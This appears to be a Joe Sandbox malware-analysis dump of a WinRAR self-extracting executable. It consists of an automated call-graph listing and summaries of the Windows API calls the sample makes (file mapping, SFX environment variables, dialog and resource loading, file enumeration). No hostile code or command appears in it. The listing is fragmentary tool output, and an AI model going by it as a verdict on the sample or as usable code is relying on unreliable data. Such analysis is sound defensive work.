e08513 24020->24030 24364 e18c8d 103 API calls 24020->24364 24021 e084f5 24023 e084fa 24021->24023 24024 e0851c 24021->24024 24023->24030 24365 e07a0d 152 API calls 24023->24365 24024->24030 24366 e18c8d 103 API calls 24024->24366 24025->24021 24027 e0857a 24025->24027 24025->24030 24027->24030 24340 e05d1a 24027->24340 24030->23955 24031 e08605 24031->24030 24346 e08167 24031->24346 24034 e08797 24035 e0a56d 7 API calls 24034->24035 24038 e08802 24034->24038 24035->24038 24037 e0d051 82 API calls 24044 e0885d 24037->24044 24352 e07c0d 24038->24352 24039 e0898b 24369 e02021 74 API calls 24039->24369 24040 e08992 24041 e08a5f 24040->24041 24048 e089e1 24040->24048 24045 e08ab6 24041->24045 24060 e08a6a 24041->24060 24044->24030 24044->24037 24044->24039 24044->24040 24367 e08117 84 API calls 24044->24367 24368 e02021 74 API calls 24044->24368 24052 e08a4c 24045->24052 24372 e07fc0 97 API calls 24045->24372 24046 e08b14 24049 e09105 24046->24049 24067 e08b82 24046->24067 24373 e098bc 24046->24373 24047 e08ab4 24053 e0959a 80 API calls 24047->24053 24048->24046 24048->24052 24054 e0a231 3 API calls 24048->24054 24051 e0959a 80 API calls 24049->24051 24051->24030 24052->24046 24052->24047 24053->24030 24055 e08a19 24054->24055 24055->24052 24370 e092a3 97 API calls 24055->24370 24056 e0ab1a 8 API calls 24058 e08bd1 24056->24058 24061 e0ab1a 8 API calls 24058->24061 24060->24047 24371 e07db2 101 API calls 24060->24371 24080 e08be7 24061->24080 24065 e08b70 24377 e06e98 77 API calls 24065->24377 24067->24056 24068 e08e40 24073 e08e52 24068->24073 24074 e08e66 24068->24074 24093 e08d49 24068->24093 24069 e08d18 24071 e08d8a 24069->24071 24072 e08d28 24069->24072 24070 e08cbc 24070->24068 24070->24069 24078 e08167 19 API calls 24071->24078 24075 e08d6e 24072->24075 24083 e08d37 24072->24083 24076 e09215 123 API calls 24073->24076 24077 e13377 75 API calls 24074->24077 24075->24093 24380 e077b8 111 API calls 24075->24380 24076->24093 24079 e08e7f 24077->24079 24084 e08dbd 
24078->24084 24086 e13020 123 API calls 24079->24086 24080->24070 24081 e08c93 24080->24081 24087 e0981a 79 API calls 24080->24087 24081->24070 24378 e09a3c 82 API calls 24081->24378 24379 e02021 74 API calls 24083->24379 24089 e08df5 24084->24089 24090 e08de6 24084->24090 24084->24093 24086->24093 24087->24081 24382 e09155 93 API calls __EH_prolog 24089->24382 24381 e07542 85 API calls 24090->24381 24096 e08f85 24093->24096 24383 e02021 74 API calls 24093->24383 24095 e09090 24095->24049 24097 e0a4ed 3 API calls 24095->24097 24096->24049 24096->24095 24098 e0903e 24096->24098 24358 e09f09 SetEndOfFile 24096->24358 24099 e090eb 24097->24099 24359 e09da2 24098->24359 24099->24049 24384 e02021 74 API calls 24099->24384 24102 e09085 24104 e09620 77 API calls 24102->24104 24104->24095 24105 e090fb 24385 e06dcb 76 API calls _wcschr 24105->24385 24108 e016a4 24107->24108 24401 e0cee1 86 API calls 24108->24401 24112 e09f59 24111->24112 24113 e09f63 24112->24113 24402 e06d0c 78 API calls 24112->24402 24113->23943 24115->23958 24117 e0b50f __EH_prolog 24116->24117 24122 e0f1d0 82 API calls 24117->24122 24119 e0b521 24123 e0b61e 24119->24123 24122->24119 24124 e0b630 __cftof 24123->24124 24127 e110dc 24124->24127 24130 e1109e GetCurrentProcess GetProcessAffinityMask 24127->24130 24131 e0b597 24130->24131 24131->23975 24146 e01732 24132->24146 24134 e013d6 24135 e09e80 24134->24135 24137 e09e92 24135->24137 24138 e09ea5 24135->24138 24136 e09eb0 24136->23989 24137->24136 24163 e06d5b 77 API calls 24137->24163 24138->24136 24140 e09eb8 SetFilePointer 24138->24140 24140->24136 24141 e09ed4 GetLastError 24140->24141 24141->24136 24142 e09ede 24141->24142 24142->24136 24164 e06d5b 77 API calls 24142->24164 24144->23992 24145->23988 24147 e01748 24146->24147 24158 e017a0 __InternalCxxFrameHandler 24146->24158 24148 e01771 24147->24148 24159 e06c36 76 API calls __vswprintf_c_l 24147->24159 24149 e017c7 24148->24149 24155 e0178d ___std_exception_copy 24148->24155 24151 e23e3e 22 API 
calls 24149->24151 24153 e017ce 24151->24153 24152 e01767 24160 e06ca7 75 API calls 24152->24160 24153->24158 24162 e06ca7 75 API calls 24153->24162 24155->24158 24161 e06ca7 75 API calls 24155->24161 24158->24134 24159->24152 24160->24148 24161->24158 24162->24158 24163->24138 24164->24136 24166 e0cf4d 24165->24166 24168 e0cf54 24165->24168 24170 e0981a 24166->24170 24168->23997 24169->23999 24171 e09833 24170->24171 24173 e09e80 79 API calls 24171->24173 24172 e09865 24172->24168 24173->24172 24175 e1de78 24174->24175 24176 e0e617 53 API calls 24175->24176 24177 e1de9b 24176->24177 24178 e04092 _swprintf 51 API calls 24177->24178 24179 e1dead 24178->24179 24180 e1d4d4 16 API calls 24179->24180 24181 e11b7c 24180->24181 24181->23951 24183 e019bb 24182->24183 24184 e019bf 24182->24184 24183->24006 24187 e09e80 79 API calls 24184->24187 24185 e019d4 24188 e018f6 24185->24188 24187->24185 24189 e01945 24188->24189 24190 e01908 24188->24190 24196 e03fa3 24189->24196 24191 e03b2d 101 API calls 24190->24191 24194 e01928 24191->24194 24194->24183 24200 e03fac 24196->24200 24197 e03b2d 101 API calls 24197->24200 24198 e01966 24198->24194 24201 e01e50 24198->24201 24200->24197 24200->24198 24213 e10e08 24200->24213 24202 e01e5a __EH_prolog 24201->24202 24221 e03bba 24202->24221 24204 e01e84 24205 e01732 78 API calls 24204->24205 24209 e01f0b 24204->24209 24206 e01e9b 24205->24206 24249 e018a9 78 API calls 24206->24249 24208 e01eb3 24211 e01ebf _wcslen 24208->24211 24250 e11b84 MultiByteToWideChar 24208->24250 24209->24194 24251 e018a9 78 API calls 24211->24251 24214 e10e0f 24213->24214 24215 e10e2a 24214->24215 24219 e06c31 RaiseException _com_raise_error 24214->24219 24217 e10e3b SetThreadExecutionState 24215->24217 24220 e06c31 RaiseException _com_raise_error 24215->24220 24217->24200 24219->24215 24220->24217 24222 e03bc4 __EH_prolog 24221->24222 24223 e03bf6 24222->24223 24224 e03bda 24222->24224 24226 e03e51 24223->24226 24229 e03c22 24223->24229 24277 e0138b 74 API 
calls 24224->24277 24302 e0138b 74 API calls 24226->24302 24228 e03be5 24228->24204 24229->24228 24252 e13377 24229->24252 24231 e03ca3 24232 e03d2e 24231->24232 24248 e03c9a 24231->24248 24280 e0d051 24231->24280 24262 e0ab1a 24232->24262 24233 e03c9f 24233->24231 24279 e020bd 78 API calls 24233->24279 24235 e03c71 24235->24231 24235->24233 24236 e03c8f 24235->24236 24278 e0138b 74 API calls 24236->24278 24239 e03d41 24242 e03dd7 24239->24242 24243 e03dc7 24239->24243 24286 e13020 24242->24286 24266 e09215 24243->24266 24246 e03dd5 24246->24248 24295 e02021 74 API calls 24246->24295 24296 e12297 24248->24296 24249->24208 24250->24211 24251->24209 24253 e1338c 24252->24253 24255 e13396 ___std_exception_copy 24252->24255 24303 e06ca7 75 API calls 24253->24303 24256 e134c6 24255->24256 24257 e1341c 24255->24257 24260 e13440 __cftof 24255->24260 24305 e2238d RaiseException 24256->24305 24304 e132aa 75 API calls 3 library calls 24257->24304 24260->24235 24261 e134f2 24263 e0ab28 24262->24263 24265 e0ab32 24262->24265 24264 e1eb38 8 API calls 24263->24264 24264->24265 24265->24239 24267 e0921f __EH_prolog 24266->24267 24306 e07c64 24267->24306 24270 e013ba 78 API calls 24271 e09231 24270->24271 24309 e0d114 24271->24309 24273 e09243 24274 e0928a 24273->24274 24276 e0d114 118 API calls 24273->24276 24318 e0d300 97 API calls __InternalCxxFrameHandler 24273->24318 24274->24246 24276->24273 24277->24228 24278->24248 24279->24231 24281 e0d072 24280->24281 24282 e0d084 24280->24282 24319 e0603a 82 API calls 24281->24319 24320 e0603a 82 API calls 24282->24320 24285 e0d07c 24285->24232 24287 e13052 24286->24287 24288 e13029 24286->24288 24289 e13046 24287->24289 24335 e1552f 123 API calls 2 library calls 24287->24335 24288->24289 24291 e13048 24288->24291 24292 e1303e 24288->24292 24289->24246 24334 e1624a 118 API calls 24291->24334 24321 e16cdc 24292->24321 24295->24248 24297 e122a1 24296->24297 24298 e122ba 24297->24298 24301 e122ce 24297->24301 24336 e10eed 86 API calls 
24298->24336 24300 e122c1 24300->24301 24302->24228 24303->24255 24304->24260 24305->24261 24307 e0b146 GetVersionExW 24306->24307 24308 e07c69 24307->24308 24308->24270 24311 e0d12a __InternalCxxFrameHandler 24309->24311 24310 e0d29a 24312 e0d2ce 24310->24312 24313 e0d0cb 6 API calls 24310->24313 24311->24310 24315 e18c8d 103 API calls 24311->24315 24316 e0d291 24311->24316 24317 e0ac05 91 API calls 24311->24317 24314 e10e08 SetThreadExecutionState RaiseException 24312->24314 24313->24312 24314->24316 24315->24311 24316->24273 24317->24311 24318->24273 24319->24285 24320->24285 24322 e1359e 75 API calls 24321->24322 24329 e16ced __InternalCxxFrameHandler 24322->24329 24323 e0d114 118 API calls 24323->24329 24324 e170fe 24325 e15202 98 API calls 24324->24325 24326 e1710e __InternalCxxFrameHandler 24325->24326 24326->24289 24327 e111cf 81 API calls 24327->24329 24328 e13e0b 118 API calls 24328->24329 24329->24323 24329->24324 24329->24327 24329->24328 24330 e17153 118 API calls 24329->24330 24331 e10f86 88 API calls 24329->24331 24332 e1390d 98 API calls 24329->24332 24333 e177ef 123 API calls 24329->24333 24330->24329 24331->24329 24332->24329 24333->24329 24334->24289 24335->24289 24336->24300 24337->24016 24338->24016 24339->24013 24341 e05d2a 24340->24341 24386 e05c4b 24341->24386 24343 e05d95 24343->24031 24344 e05d5d 24344->24343 24391 e0b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24344->24391 24347 e08186 24346->24347 24348 e08232 24347->24348 24398 e0be5e 19 API calls __InternalCxxFrameHandler 24347->24398 24397 e11fac CharUpperW 24348->24397 24351 e0823b 24351->24034 24353 e07c22 24352->24353 24354 e07c5a 24353->24354 24399 e06e7a 74 API calls 24353->24399 24354->24044 24356 e07c52 24400 e0138b 74 API calls 24356->24400 24358->24098 24360 e09db3 24359->24360 24363 e09dc2 24359->24363 24361 e09db9 FlushFileBuffers 24360->24361 24360->24363 24361->24363 24362 e09e3f SetFileTime 24362->24102 24363->24362 24364->24025 24365->24030 
24366->24030 24367->24044 24368->24044 24369->24040 24370->24052 24371->24047 24372->24052 24374 e08b5a 24373->24374 24375 e098c5 GetFileType 24373->24375 24374->24067 24376 e02021 74 API calls 24374->24376 24375->24374 24376->24065 24377->24067 24378->24070 24379->24093 24380->24093 24381->24093 24382->24093 24383->24096 24384->24105 24385->24049 24392 e05b48 24386->24392 24389 e05b48 2 API calls 24390 e05c6c 24389->24390 24390->24344 24391->24344 24393 e05b52 24392->24393 24395 e05c3a 24393->24395 24396 e0b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24393->24396 24395->24389 24395->24390 24396->24393 24397->24351 24398->24348 24399->24356 24400->24354 24402->24113 24404 e0a6a8 24403->24404 24405 e0a6c1 FindFirstFileW 24404->24405 24406 e0a727 FindNextFileW 24404->24406 24407 e0a6d0 24405->24407 24413 e0a709 24405->24413 24408 e0a732 GetLastError 24406->24408 24406->24413 24409 e0bb03 GetCurrentDirectoryW 24407->24409 24408->24413 24410 e0a6e0 24409->24410 24411 e0a6e4 FindFirstFileW 24410->24411 24412 e0a6fe GetLastError 24410->24412 24411->24412 24411->24413 24412->24413 24413->23964 24423 e1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24414->24423 24416 e1a5cd 24417 e1a5d9 24416->24417 24424 e1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24416->24424 24417->23608 24417->23610 24419->23609 24420->23618 24421->23618 24422->23621 24423->24416 24424->24417 24425->23628 24427 e09f42 78 API calls 24426->24427 24428 e01fe8 24427->24428 24429 e01a04 101 API calls 24428->24429 24432 e02005 24428->24432 24430 e01ff5 24429->24430 24430->24432 24433 e0138b 74 API calls 24430->24433 24432->23637 24432->23638 24433->24432 24435 e1b583 GetMessageW 24434->24435 24436 e1b5bc GetDlgItem 24434->24436 24437 e1b599 IsDialogMessageW 24435->24437 24438 e1b5a8 TranslateMessage DispatchMessageW 24435->24438 24436->23648 24436->23649 24437->24436 24437->24438 24438->24436 24439 e013e1 84 API calls 2 library calls 25312 e194e0 GetClientRect 25348 
e121e0 26 API calls std::bad_exception::bad_exception 25374 e1f2e0 46 API calls __RTC_Initialize 25375 e2bee0 GetCommandLineA GetCommandLineW 24441 e1eae7 24442 e1eaf1 24441->24442 24445 e1e85d 24442->24445 24471 e1e5bb 24445->24471 24447 e1e86d 24448 e1e8ca 24447->24448 24452 e1e8ee 24447->24452 24449 e1e7fb DloadReleaseSectionWriteAccess 6 API calls 24448->24449 24450 e1e8d5 RaiseException 24449->24450 24451 e1eac3 24450->24451 24453 e1e966 LoadLibraryExA 24452->24453 24454 e1e9c7 24452->24454 24459 e1e9d9 24452->24459 24467 e1ea95 24452->24467 24453->24454 24455 e1e979 GetLastError 24453->24455 24454->24459 24460 e1e9d2 FreeLibrary 24454->24460 24456 e1e9a2 24455->24456 24457 e1e98c 24455->24457 24461 e1e7fb DloadReleaseSectionWriteAccess 6 API calls 24456->24461 24457->24454 24457->24456 24458 e1ea37 GetProcAddress 24462 e1ea47 GetLastError 24458->24462 24458->24467 24459->24458 24459->24467 24460->24459 24463 e1e9ad RaiseException 24461->24463 24464 e1ea5a 24462->24464 24463->24451 24466 e1e7fb DloadReleaseSectionWriteAccess 6 API calls 24464->24466 24464->24467 24468 e1ea7b RaiseException 24466->24468 24480 e1e7fb 24467->24480 24469 e1e5bb ___delayLoadHelper2@8 6 API calls 24468->24469 24470 e1ea92 24469->24470 24470->24467 24472 e1e5c7 24471->24472 24473 e1e5ed 24471->24473 24488 e1e664 24472->24488 24473->24447 24475 e1e5cc 24476 e1e5e8 24475->24476 24491 e1e78d 24475->24491 24496 e1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24476->24496 24479 e1e836 24479->24447 24481 e1e80d 24480->24481 24482 e1e82f 24480->24482 24483 e1e664 DloadReleaseSectionWriteAccess 3 API calls 24481->24483 24482->24451 24484 e1e812 24483->24484 24485 e1e82a 24484->24485 24486 e1e78d DloadProtectSection 3 API calls 24484->24486 24499 e1e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24485->24499 24486->24485 24497 e1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24488->24497 24490 e1e669 24490->24475 24494 e1e7a2 DloadProtectSection 
24491->24494 24492 e1e7a8 24492->24476 24493 e1e7dd VirtualProtect 24493->24492 24494->24492 24494->24493 24498 e1e6a3 VirtualQuery GetSystemInfo 24494->24498 24496->24479 24497->24490 24498->24493 24499->24482 25313 e1f4e7 29 API calls _abort 25349 e0f1e8 FreeLibrary 25350 e095f0 80 API calls 25351 e1fd4f 9 API calls 2 library calls 25376 e05ef0 82 API calls 24506 e298f0 24514 e2adaf 24506->24514 24510 e2990c 24511 e29919 24510->24511 24522 e29920 11 API calls 24510->24522 24513 e29904 24523 e2ac98 24514->24523 24517 e2adee TlsAlloc 24518 e2addf 24517->24518 24519 e1fbbc CatchGuardHandler 5 API calls 24518->24519 24520 e298fa 24519->24520 24520->24513 24521 e29869 20 API calls 2 library calls 24520->24521 24521->24510 24522->24513 24524 e2acc8 24523->24524 24528 e2acc4 24523->24528 24524->24517 24524->24518 24525 e2ace8 24525->24524 24527 e2acf4 GetProcAddress 24525->24527 24529 e2ad04 __dosmaperr 24527->24529 24528->24524 24528->24525 24530 e2ad34 24528->24530 24529->24524 24531 e2ad55 LoadLibraryExW 24530->24531 24536 e2ad4a 24530->24536 24532 e2ad72 GetLastError 24531->24532 24533 e2ad8a 24531->24533 24532->24533 24534 e2ad7d LoadLibraryExW 24532->24534 24535 e2ada1 FreeLibrary 24533->24535 24533->24536 24534->24533 24535->24536 24536->24528 24538 e2abf0 24540 e2abfb 24538->24540 24541 e2ac24 24540->24541 24542 e2ac20 24540->24542 24544 e2af0a 24540->24544 24551 e2ac50 DeleteCriticalSection 24541->24551 24545 e2ac98 __dosmaperr 5 API calls 24544->24545 24546 e2af31 24545->24546 24547 e2af4f InitializeCriticalSectionAndSpinCount 24546->24547 24550 e2af3a 24546->24550 24547->24550 24548 e1fbbc CatchGuardHandler 5 API calls 24549 e2af66 24548->24549 24549->24540 24550->24548 24551->24542 25314 e288f0 7 API calls ___scrt_uninitialize_crt 25316 e22cfb 38 API calls 4 library calls 25353 e1b5c0 100 API calls 25391 e177c0 118 API calls 25392 e1ffc0 RaiseException _com_raise_error _com_error::_com_error 24576 e1dec2 24577 e1decf 24576->24577 24578 e0e617 53 API calls 
24577->24578 24579 e1dedc 24578->24579 24580 e04092 _swprintf 51 API calls 24579->24580 24581 e1def1 SetDlgItemTextW 24580->24581 24582 e1b568 5 API calls 24581->24582 24583 e1df0e 24582->24583 25377 e162ca 123 API calls __InternalCxxFrameHandler 24591 e1e1d1 14 API calls ___delayLoadHelper2@8 25318 e1f4d3 20 API calls 25394 e2a3d0 21 API calls 2 library calls 25395 e32bd0 VariantClear 24594 e010d5 24599 e05abd 24594->24599 24600 e05ac7 __EH_prolog 24599->24600 24601 e0b505 84 API calls 24600->24601 24602 e05ad3 24601->24602 24606 e05cac GetCurrentProcess GetProcessAffinityMask 24602->24606 24607 e1e2d7 24608 e1e1db 24607->24608 24609 e1e85d ___delayLoadHelper2@8 14 API calls 24608->24609 24609->24608 25380 e20ada 51 API calls 2 library calls 25319 e1dca1 DialogBoxParamW 25396 e1f3a0 27 API calls 25322 e2a4a0 71 API calls _free 25323 e308a0 IsProcessorFeaturePresent 25355 e1eda7 48 API calls _unexpected 25397 e06faa 111 API calls 3 library calls 25357 e1b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24808 e1f3b2 24809 e1f3be __FrameHandler3::FrameUnwindToState 24808->24809 24840 e1eed7 24809->24840 24811 e1f3c5 24812 e1f518 24811->24812 24815 e1f3ef 24811->24815 24913 e1f838 4 API calls 2 library calls 24812->24913 24814 e1f51f 24906 e27f58 24814->24906 24822 e1f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24815->24822 24851 e28aed 24815->24851 24825 e1f48f 24822->24825 24909 e27af4 38 API calls 2 library calls 24822->24909 24823 e1f40e 24859 e1f953 GetStartupInfoW __cftof 24825->24859 24827 e1f495 24860 e28a3e 51 API calls 24827->24860 24830 e1f49d 24861 e1df1e 24830->24861 24834 e1f4b1 24834->24814 24835 e1f4b5 24834->24835 24836 e1f4be 24835->24836 24911 e27efb 28 API calls _abort 24835->24911 24912 e1f048 12 API calls ___scrt_uninitialize_crt 24836->24912 24839 e1f4c6 24839->24823 24841 e1eee0 24840->24841 24915 e1f654 IsProcessorFeaturePresent 24841->24915 24843 e1eeec 24916 e22a5e 24843->24916 24845 e1eef5 24845->24811 24846 

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00E10863: GetModuleHandleW.KERNEL32(kernel32), ref: 00E1087C
                                                                                                      • Part of subcall function 00E10863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E1088E
                                                                                                      • Part of subcall function 00E10863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E108BF
                                                                                                      • Part of subcall function 00E1A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E1A655
                                                                                                      • Part of subcall function 00E1AC16: OleInitialize.OLE32(00000000), ref: 00E1AC2F
                                                                                                      • Part of subcall function 00E1AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E1AC66
                                                                                                      • Part of subcall function 00E1AC16: SHGetMalloc.SHELL32(00E48438), ref: 00E1AC70
                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E1DF5C
                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E1DF83
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E1DF94
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00E1DFCE
                                                                                                      • Part of subcall function 00E1DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E1DBF4
                                                                                                      • Part of subcall function 00E1DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E1DC30
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E1DFD7
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00E5EC90,00000800), ref: 00E1DFF2
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00E5EC90), ref: 00E1DFFE
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00E1E009
                                                                                                    • _swprintf.LIBCMT ref: 00E1E048
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E1E05A
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00E1E061
                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00E1E078
                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00E1E0C9
                                                                                                    • Sleep.KERNEL32(?), ref: 00E1E0F7
                                                                                                    • DeleteObject.GDI32 ref: 00E1E130
                                                                                                    • DeleteObject.GDI32(?), ref: 00E1E140
                                                                                                    • CloseHandle.KERNEL32 ref: 00E1E183
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                    • API String ID: 3049964643-271953491
                                                                                                    • Opcode ID: 4dca30f14138a3c52d996a3cacfdd009717af2429c577ff9c0d57259bcbb3e49
                                                                                                    • Instruction ID: ddaf07f152632c180e3eb3d80294fe3337d91dcb7a42857b1cd2d27804c01ff4
                                                                                                    • Opcode Fuzzy Hash: 4dca30f14138a3c52d996a3cacfdd009717af2429c577ff9c0d57259bcbb3e49
                                                                                                    • Instruction Fuzzy Hash: 53612A71605304BFD324AB72EC49FAB7BECAB45705F041429F945B2292DB7499CCC761

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6D5
                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6EC
                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A703
                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A712
                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E1B73D,00000066), ref: 00E1A72D
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E1A73E
                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E1A762
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E1A7C6
                                                                                                      • Part of subcall function 00E1A626: GdipAlloc.GDIPLUS(00000010), ref: 00E1A62C
                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E1A7A7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00E1A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                    • String ID: Fjun$PNG
                                                                                                    • API String ID: 211097158-1136719808
                                                                                                    • Opcode ID: 8e87ad5bb62a9a0bf58d48ad5fce3856c17da24b11c8f0eabcecab97b09462dc
                                                                                                    • Instruction ID: 14b67041cfec8f4027acf423a616415bbac7d4e9faf34e0d135400daec4db64e
                                                                                                    • Opcode Fuzzy Hash: 8e87ad5bb62a9a0bf58d48ad5fce3856c17da24b11c8f0eabcecab97b09462dc
                                                                                                    • Instruction Fuzzy Hash: 8D31B275502306AFC7209F32EC48D6BBFB8EF84765B04152AF805E2260EB31DD888A51

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 1032 e0a69b-e0a6bf call e1ec50 1035 e0a6c1-e0a6ce FindFirstFileW 1032->1035 1036 e0a727-e0a730 FindNextFileW 1032->1036 1037 e0a6d0-e0a6e2 call e0bb03 1035->1037 1038 e0a742-e0a7ff call e10602 call e0c310 call e115da * 3 1035->1038 1036->1038 1039 e0a732-e0a740 GetLastError 1036->1039 1046 e0a6e4-e0a6fc FindFirstFileW 1037->1046 1047 e0a6fe-e0a707 GetLastError 1037->1047 1044 e0a804-e0a811 1038->1044 1041 e0a719-e0a722 1039->1041 1041->1044 1046->1038 1046->1047 1050 e0a717 1047->1050 1051 e0a709-e0a70c 1047->1051 1050->1041 1051->1050 1053 e0a70e-e0a711 1051->1053 1053->1050 1055 e0a713-e0a715 1053->1055 1055->1041
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6C4
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6F2
                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6FE
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A728
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A734
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 42610566-0
                                                                                                    • Opcode ID: c3e4a687482a80d49879a7f3922dc6aa67fc588a40b385e35ae4e42a6a14442b
                                                                                                    • Instruction ID: 14e321851a45c1e20f941e85d358b730e5d0c3850360f7881f4c6d459b4f3433
                                                                                                    • Opcode Fuzzy Hash: c3e4a687482a80d49879a7f3922dc6aa67fc588a40b385e35ae4e42a6a14442b
